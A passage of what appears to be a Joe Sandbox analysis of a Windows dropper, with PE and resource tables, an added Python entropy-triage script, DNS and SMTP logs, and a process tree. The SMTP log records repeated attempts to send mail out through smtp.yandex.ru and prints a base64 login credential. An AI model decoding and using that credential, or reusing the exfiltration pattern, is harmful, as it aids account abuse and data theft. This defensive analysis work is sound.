                                       IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0xbc          .rdata
                                       IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                       Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
                                       .text   0x1000           0xc1c         0xe00     4b3f16d7c1b1a72b03a6b6a1781a9421  False     0.4771205357142857   data       5.123931017549605   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                       .rdata  0x2000           0x4c0         0x600     128067a33e449c96b8dc66824ad4bcd5  False     0.4088541666666667   data       4.217635826521946   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                       .data   0x3000           0xd6f0        0x600     7701054449ed29f5803ce4903a7bfc7b  False     0.16927083333333334  data       1.725550805200182   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                       .rsrc   0x11000          0x9ace0       0x9ae00   23a1bd3fd1fad6deedcc48bfc8342afa  False     0.946594090496368    data       7.921113520173662   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                       Name           RVA      Size     Type                                                                                              Language  Country        ZLIB Complexity
                                       IMAGE          0x11210  0x42     PC bitmap, Windows 3.x format, 1 x 1 x 1, image size 4, cbSize 66, bits offset 62                   English   United States  0.5151515151515151
                                       RT_ICON        0x11254  0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3937 x 3937 px/m                              0.7863475177304965
                                       RT_ICON        0x116bc  0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3937 x 3937 px/m                              0.7070825515947468
                                       RT_ICON        0x12764  0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3937 x 3937 px/m                              0.666908713692946
                                       RT_ICON        0x14d0c  0x10828  Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3937 x 3937 px/m                           0.6154915414645687
                                       RT_RCDATA      0x25534  0x8670c  data                                                                                                                       0.9956325771608301
                                       RT_RCDATA      0xabc40  0x5e     data                                                                                                                       0.8297872340425532
                                       RT_GROUP_ICON  0xabca0  0x3e     data                                                                                                                       0.8064516129032258
                                       DLL           Import
                                       user32.dll    UpdateWindow, TranslateMessage, ShowWindow, SendMessageA, RegisterClassExA, PostQuitMessage, MessageBoxA, LoadIconA, LoadCursorA, GetMessageA, DispatchMessageA, DefWindowProcA, CreateWindowExA
                                       kernel32.dll  GetModuleHandleA, HeapAlloc, lstrlenA, lstrcpynA, lstrcpyA, lstrcatA, WriteFile, SizeofResource, SetFileAttributesA, RtlMoveMemory, LockResource, LoadResource, LoadLibraryA, CloseHandle, CreateFileA, ExitProcess, FindResourceA, FreeResource, GetCommandLineA, GetEnvironmentVariableA, GetFileSize, GetModuleFileNameA, GlobalFree, GetProcAddress, GetProcessHeap, GetSystemDirectoryA, GetTempPathA, GetWindowsDirectoryA, GlobalAlloc, HeapFree
                                       shlwapi.dll   PathFindFileNameA
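The section, resource and import tables above give the dropper's shape: .text is only 0xe00 bytes, while .rsrc holds 0x9ae00 of the file's 642,048 bytes at entropy 7.92 and ZLIB complexity 0.95, almost all of it a single RT_RCDATA entry of 0x8670c bytes, and the kernel32 imports (FindResourceA, LoadResource, LockResource, SizeofResource, GetTempPathA, CreateFileA, WriteFile) are exactly what is needed to write that resource to %TEMP% and run it. A quick triage check for this shape, as an added example that is not part of the Joe Sandbox report: parse the PE section table with the Python standard library only, compute per-section entropy on the same 0 to 8 bits-per-byte scale the report's Entropy column uses, and flag any section that is both high-entropy and most of the file. The fixture PE it builds is constructed for the demo and is not loadable (zeroed optional header); the 7.0 entropy and 50% share thresholds are my choice, not values from the report.

```python
import math
import struct
import sys

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 to 8.0), the scale of the report's Entropy column."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """DOS header -> PE signature -> COFF header -> section table; returns one dict per section."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    number_of_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_of_optional_header = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + size_of_optional_header
    sections = []
    for i in range(number_of_sections):
        name, vsize, va, raw_size, raw_ptr, _r, _l, _nr, _nl, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, table + i * 40)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va,
            "virtual_size": vsize,
            "raw_size": raw_size,
            "entropy": shannon_entropy(raw),
            "share_of_file": raw_size / len(pe),
            "executable": bool(chars & IMAGE_SCN_MEM_EXECUTE),
            "writable": bool(chars & IMAGE_SCN_MEM_WRITE),
        })
    return sections


def triage(pe: bytes, entropy_threshold: float = 7.0, share_threshold: float = 0.5):
    """Names of sections that are both high-entropy and most of the file. Thresholds are my
    choice for the demo; the report's .rsrc (entropy 7.92, ~99% of the file) trips both."""
    return [s["name"] for s in parse_sections(pe)
            if s["entropy"] >= entropy_threshold and s["share_of_file"] >= share_threshold]


def build_fixture_pe() -> bytes:
    """Constructed two-section PE32 image for the demo (zeroed optional header, so it is not
    loadable): a tiny .text next to a large .rsrc whose bytes are uniformly distributed,
    standing in for an encrypted RCDATA payload."""
    text_data = b"\x55\x8b\xec" + b"\x90" * 0x1FD      # 0x200 bytes, almost all NOPs: low entropy
    rsrc_data = bytes(range(256)) * 32                   # 0x2000 bytes, every value equally often: 8.0
    size_opt = 0xE0                                      # PE32 optional header length
    file_align = 0x200
    headers_len = 0x40 + 4 + 20 + size_opt + 2 * 40
    text_ptr = -(-headers_len // file_align) * file_align   # round up to file alignment
    rsrc_ptr = text_ptr + len(text_data)

    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)              # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, size_opt, 0x0102)   # i386, 2 sections
    opt = bytearray(size_opt)
    struct.pack_into("<H", opt, 0, 0x10B)                # PE32 magic

    def section(name, data, va, raw_ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, len(data), va, len(data), raw_ptr, 0, 0, 0, 0, chars)

    table = (section(b".text", text_data, 0x1000, text_ptr, 0x60000020)     # CODE|EXECUTE|READ
             + section(b".rsrc", rsrc_data, 0x2000, rsrc_ptr, 0xC0000040))  # INIT_DATA|READ|WRITE
    image = bytearray(dos + b"PE\0\0" + coff + opt + table)
    image += b"\0" * (text_ptr - len(image))
    image += text_data + rsrc_data
    return bytes(image)


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_fixture_pe()
    for s in parse_sections(data):
        print(f"{s['name']:<8} raw=0x{s['raw_size']:x} share={s['share_of_file']:.2%} "
              f"entropy={s['entropy']:.2f} X={s['executable']} W={s['writable']}")
    print("flagged:", triage(data))
```

Run it with a path argument to triage a real file; without one it uses the fixture. The writable flag is reported because a writable .rsrc, as in this sample, is itself unusual for a compiler-emitted resource section. A UPX-packed file such as the dropped password tools above shows the same high-entropy picture but with UPX0/UPX1 section names, so the section name is worth printing alongside the entropy rather than folded into the verdict.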
                                       Language of compilation system  Country where language is spoken  Map
                                       English                         United States
                                       Timestamp                            Source Port  Dest Port  Source IP     Dest IP
                                       Nov 20, 2024 18:16:11.868102074 CET  49773        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:11.990236044 CET  587          49773      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:11.990369081 CET  49773        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:13.327908993 CET  587          49773      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:13.328243017 CET  49773        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:13.448311090 CET  587          49773      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:13.779552937 CET  587          49773      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:13.822511911 CET  49773        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:16.183092117 CET  49773        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:16.302747965 CET  587          49773      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:16.633975983 CET  587          49773      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:16.634306908 CET  49773        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:16.760273933 CET  587          49773      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:17.091847897 CET  587          49773      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:17.092181921 CET  49773        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:17.214102030 CET  587          49773      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:17.546240091 CET  587          49773      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:17.547012091 CET  49773        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:17.667964935 CET  587          49773      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:17.998668909 CET  587          49773      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:17.998811007 CET  587          49773      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:17.998950958 CET  49773        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:18.000125885 CET  49773        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:20.219835043 CET  49794        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:20.339644909 CET  587          49794      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:20.339843988 CET  49794        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:21.644499063 CET  587          49794      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:21.644757986 CET  49794        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:21.766612053 CET  587          49794      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:22.094769955 CET  587          49794      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:22.135102987 CET  49794        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:24.355240107 CET  49794        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:24.483371973 CET  587          49794      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:24.813040972 CET  587          49794      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:24.813414097 CET  49794        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:24.935065031 CET  587          49794      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:25.264879942 CET  587          49794      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:25.265281916 CET  49794        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:25.386400938 CET  587          49794      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:25.713968039 CET  587          49794      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:25.714380026 CET  49794        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:25.838973045 CET  587          49794      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:26.167982101 CET  587          49794      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:26.168102026 CET  49794        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:26.168275118 CET  587          49794      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:26.168329000 CET  49794        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:28.410141945 CET  49812        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:28.533804893 CET  587          49812      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:28.533994913 CET  49812        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:30.503196955 CET  587          49812      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:30.503515959 CET  49812        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:30.624859095 CET  587          49812      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:30.953548908 CET  587          49812      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:30.994404078 CET  49812        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:33.214977026 CET  49812        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:33.336726904 CET  587          49812      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:33.667423964 CET  587          49812      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:33.667799950 CET  49812        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:33.787590027 CET  587          49812      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:34.116558075 CET  587          49812      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:34.116959095 CET  49812        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:34.421134949 CET  587          49812      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:34.750417948 CET  587          49812      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:34.750996113 CET  49812        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:34.871990919 CET  587          49812      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:35.201277971 CET  587          49812      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:35.201572895 CET  49812        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:35.201667070 CET  587          49812      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:35.201730013 CET  49812        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:37.461932898 CET  49832        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:37.581631899 CET  587          49832      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:37.581729889 CET  49832        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:38.904958010 CET  587          49832      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:38.905217886 CET  49832        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:39.024863958 CET  587          49832      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:39.358840942 CET  587          49832      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:39.400790930 CET  49832        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:41.605813980 CET  49832        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:41.725869894 CET  587          49832      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:42.060802937 CET  587          49832      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:42.061247110 CET  49832        587        192.168.2.4   77.88.21.158
                                       Nov 20, 2024 18:16:42.187500954 CET  587          49832      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:42.519639969 CET  587          49832      77.88.21.158  192.168.2.4
                                       Nov 20, 2024 18:16:42.520215034 CET  49832        587        192.168.2.4   77.88.21.158
                                      Nov 20, 2024 18:16:42.640882015 CET5874983277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:42.973721027 CET5874983277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:42.974473000 CET49832587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:43.097871065 CET5874983277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:43.429357052 CET5874983277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:43.429617882 CET49832587192.168.2.477.88.21.158
                                      Nov 20, 2024 18:16:43.429840088 CET5874983277.88.21.158192.168.2.4
                                      Nov 20, 2024 18:16:43.429904938 CET49832587192.168.2.477.88.21.158
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2024 18:16:11.723012924 CET | 63303 | 53 | 192.168.2.4 | 1.1.1.1
Nov 20, 2024 18:16:11.864573956 CET | 53 | 63303 | 1.1.1.1 | 192.168.2.4
Nov 20, 2024 18:16:13.781656981 CET | 59554 | 53 | 192.168.2.4 | 1.1.1.1
Nov 20, 2024 18:16:13.926933050 CET | 53 | 59554 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 20, 2024 18:16:11.723012924 CET | 192.168.2.4 | 1.1.1.1 | 0xce81 | Standard query (0) | smtp.yandex.ru | A (IP address) | IN (0x0001) | false
Nov 20, 2024 18:16:13.781656981 CET | 192.168.2.4 | 1.1.1.1 | 0x8978 | Standard query (0) | yandex.ru | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 20, 2024 18:16:11.864573956 CET | 1.1.1.1 | 192.168.2.4 | 0xce81 | No error (0) | smtp.yandex.ru | | 77.88.21.158 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 18:16:13.926933050 CET | 1.1.1.1 | 192.168.2.4 | 0x8978 | No error (0) | yandex.ru | | 5.255.255.77 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 18:16:13.926933050 CET | 1.1.1.1 | 192.168.2.4 | 0x8978 | No error (0) | yandex.ru | | 77.88.55.88 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 18:16:13.926933050 CET | 1.1.1.1 | 192.168.2.4 | 0x8978 | No error (0) | yandex.ru | | 77.88.44.55 | A (IP address) | IN (0x0001) | false
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 20, 2024 18:16:13.327908993 CET | 587 | 49773 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-10.sas.yp-c.yandex.net Ok 1732122973-CGWIbm7OqGk0
Nov 20, 2024 18:16:13.328243017 CET | 49773 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 927537.yandex.ru
Nov 20, 2024 18:16:13.779552937 CET | 587 | 49773 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-10.sas.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 20, 2024 18:16:16.183092117 CET | 49773 | 587 | 192.168.2.4 | 77.88.21.158 | AUTH PLAIN AGFsZXhhbmRyS29uZHJhdGlldjUAcXdlcnR5NQ==
Nov 20, 2024 18:16:16.633975983 CET | 587 | 49773 | 77.88.21.158 | 192.168.2.4 | 530 5.7.7 Email sending without SSL/TLS encryption is not allowed. Please see: https://yandex.ru/support/mail/mail-clients/ssl.html 1732122976-CGWIbm7OqGk0
Nov 20, 2024 18:16:16.634306908 CET | 49773 | 587 | 192.168.2.4 | 77.88.21.158 | AUTH LOGIN
Nov 20, 2024 18:16:17.091847897 CET | 587 | 49773 | 77.88.21.158 | 192.168.2.4 | 530 5.7.7 Email sending without SSL/TLS encryption is not allowed. Please see: https://yandex.ru/support/mail/mail-clients/ssl.html 1732122976-CGWIbm7OqGk0
Nov 20, 2024 18:16:17.092181921 CET | 49773 | 587 | 192.168.2.4 | 77.88.21.158 | MAIL FROM:<alexandrKondratiev5@yandex.ru>
Nov 20, 2024 18:16:17.546240091 CET | 587 | 49773 | 77.88.21.158 | 192.168.2.4 | 503 5.5.4 Error: send AUTH command first. 1732122977-CGWIbm7OqGk0-ZV5W5d5G
Nov 20, 2024 18:16:17.547012091 CET | 49773 | 587 | 192.168.2.4 | 77.88.21.158 | QUIT
Nov 20, 2024 18:16:17.998668909 CET | 587 | 49773 | 77.88.21.158 | 192.168.2.4 | 221 2.0.0 Closing connecton
Nov 20, 2024 18:16:21.644499063 CET | 587 | 49794 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-44.sas.yp-c.yandex.net Ok 1732122981-LGW1jF7OhKo0
Nov 20, 2024 18:16:21.644757986 CET | 49794 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 927537.yandex.ru
Nov 20, 2024 18:16:22.094769955 CET | 587 | 49794 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-44.sas.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 20, 2024 18:16:24.355240107 CET | 49794 | 587 | 192.168.2.4 | 77.88.21.158 | AUTH PLAIN AGFsZXhhbmRyS29uZHJhdGlldjUAcXdlcnR5NQ==
Nov 20, 2024 18:16:24.813040972 CET | 587 | 49794 | 77.88.21.158 | 192.168.2.4 | 530 5.7.7 Email sending without SSL/TLS encryption is not allowed. Please see: https://yandex.ru/support/mail/mail-clients/ssl.html 1732122984-LGW1jF7OhKo0
Nov 20, 2024 18:16:24.813414097 CET | 49794 | 587 | 192.168.2.4 | 77.88.21.158 | AUTH LOGIN
Nov 20, 2024 18:16:25.264879942 CET | 587 | 49794 | 77.88.21.158 | 192.168.2.4 | 530 5.7.7 Email sending without SSL/TLS encryption is not allowed. Please see: https://yandex.ru/support/mail/mail-clients/ssl.html 1732122985-LGW1jF7OhKo0
Nov 20, 2024 18:16:25.265281916 CET | 49794 | 587 | 192.168.2.4 | 77.88.21.158 | MAIL FROM:<alexandrKondratiev5@yandex.ru>
Nov 20, 2024 18:16:25.713968039 CET | 587 | 49794 | 77.88.21.158 | 192.168.2.4 | 503 5.5.4 Error: send AUTH command first. 1732122985-LGW1jF7OhKo0-4P6ystnH
Nov 20, 2024 18:16:25.714380026 CET | 49794 | 587 | 192.168.2.4 | 77.88.21.158 | QUIT
Nov 20, 2024 18:16:26.167982101 CET | 587 | 49794 | 77.88.21.158 | 192.168.2.4 | 221 2.0.0 Closing connecton
Nov 20, 2024 18:16:30.503196955 CET | 587 | 49812 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-57.myt.yp-c.yandex.net Ok 1732122990-TGW0cPeOja60
Nov 20, 2024 18:16:30.503515959 CET | 49812 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 927537.yandex.ru
Nov 20, 2024 18:16:30.953548908 CET | 587 | 49812 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-57.myt.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 20, 2024 18:16:33.214977026 CET | 49812 | 587 | 192.168.2.4 | 77.88.21.158 | AUTH PLAIN AGFsZXhhbmRyS29uZHJhdGlldjUAcXdlcnR5NQ==
Nov 20, 2024 18:16:33.667423964 CET | 587 | 49812 | 77.88.21.158 | 192.168.2.4 | 530 5.7.7 Email sending without SSL/TLS encryption is not allowed. Please see: https://yandex.ru/support/mail/mail-clients/ssl.html 1732122993-TGW0cPeOja60
Nov 20, 2024 18:16:33.667799950 CET | 49812 | 587 | 192.168.2.4 | 77.88.21.158 | AUTH LOGIN
Nov 20, 2024 18:16:34.116558075 CET | 587 | 49812 | 77.88.21.158 | 192.168.2.4 | 530 5.7.7 Email sending without SSL/TLS encryption is not allowed. Please see: https://yandex.ru/support/mail/mail-clients/ssl.html 1732122993-TGW0cPeOja60
Nov 20, 2024 18:16:34.116959095 CET | 49812 | 587 | 192.168.2.4 | 77.88.21.158 | MAIL FROM:<alexandrKondratiev5@yandex.ru>
Nov 20, 2024 18:16:34.750417948 CET | 587 | 49812 | 77.88.21.158 | 192.168.2.4 | 503 5.5.4 Error: send AUTH command first. 1732122994-TGW0cPeOja60-sZVBQD1y
Nov 20, 2024 18:16:34.750996113 CET | 49812 | 587 | 192.168.2.4 | 77.88.21.158 | QUIT
Nov 20, 2024 18:16:35.201277971 CET | 587 | 49812 | 77.88.21.158 | 192.168.2.4 | 221 2.0.0 Closing connecton
Nov 20, 2024 18:16:38.904958010 CET | 587 | 49832 | 77.88.21.158 | 192.168.2.4 | 220 mail-nwsmtp-smtp-production-main-39.sas.yp-c.yandex.net Ok 1732122998-cGW2qA7OlqM0
Nov 20, 2024 18:16:38.905217886 CET | 49832 | 587 | 192.168.2.4 | 77.88.21.158 | EHLO 927537.yandex.ru
Nov 20, 2024 18:16:39.358840942 CET | 587 | 49832 | 77.88.21.158 | 192.168.2.4 | 250-mail-nwsmtp-smtp-production-main-39.sas.yp-c.yandex.net
    250-8BITMIME
    250-PIPELINING
    250-SIZE 53477376
    250-STARTTLS
    250-AUTH LOGIN PLAIN XOAUTH2
    250-DSN
    250 ENHANCEDSTATUSCODES
Nov 20, 2024 18:16:41.605813980 CET | 49832 | 587 | 192.168.2.4 | 77.88.21.158 | AUTH PLAIN AGFsZXhhbmRyS29uZHJhdGlldjUAcXdlcnR5NQ==
Nov 20, 2024 18:16:42.060802937 CET | 587 | 49832 | 77.88.21.158 | 192.168.2.4 | 530 5.7.7 Email sending without SSL/TLS encryption is not allowed. Please see: https://yandex.ru/support/mail/mail-clients/ssl.html 1732123001-cGW2qA7OlqM0
Nov 20, 2024 18:16:42.061247110 CET | 49832 | 587 | 192.168.2.4 | 77.88.21.158 | AUTH LOGIN
Nov 20, 2024 18:16:42.519639969 CET | 587 | 49832 | 77.88.21.158 | 192.168.2.4 | 530 5.7.7 Email sending without SSL/TLS encryption is not allowed. Please see: https://yandex.ru/support/mail/mail-clients/ssl.html 1732123002-cGW2qA7OlqM0
Nov 20, 2024 18:16:42.520215034 CET | 49832 | 587 | 192.168.2.4 | 77.88.21.158 | MAIL FROM:<alexandrKondratiev5@yandex.ru>
Nov 20, 2024 18:16:42.973721027 CET | 587 | 49832 | 77.88.21.158 | 192.168.2.4 | 503 5.5.4 Error: send AUTH command first. 1732123002-cGW2qA7OlqM0-wdl07VlR
Nov 20, 2024 18:16:42.974473000 CET | 49832 | 587 | 192.168.2.4 | 77.88.21.158 | QUIT
Nov 20, 2024 18:16:43.429357052 CET | 587 | 49832 | 77.88.21.158 | 192.168.2.4 | 221 2.0.0 Closing connecton


                                      Target ID:0
                                      Start time:12:14:56
                                      Start date:20/11/2024
                                      Path:C:\Users\user\Desktop\0zu73p2YBu.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\0zu73p2YBu.exe"
                                      Imagebase:0x400000
                                      File size:642'048 bytes
                                      MD5 hash:29ECA65FFA92A3F877B59DF42E2150ED
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:12:14:56
                                      Start date:20/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\ .exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\ .exe"
                                      Imagebase:0x400000
                                      File size:565'760 bytes
                                      MD5 hash:6867A307FDB19A4B89696F07FBFB1847
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:12:14:56
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\600.tmp\ip.bat" "
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:12:14:56
                                      Start date:20/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:12:14:58
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping -n 3 127.0.0.1
                                      Imagebase:0x630000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:9
                                      Start time:12:15:00
                                      Start date:20/11/2024
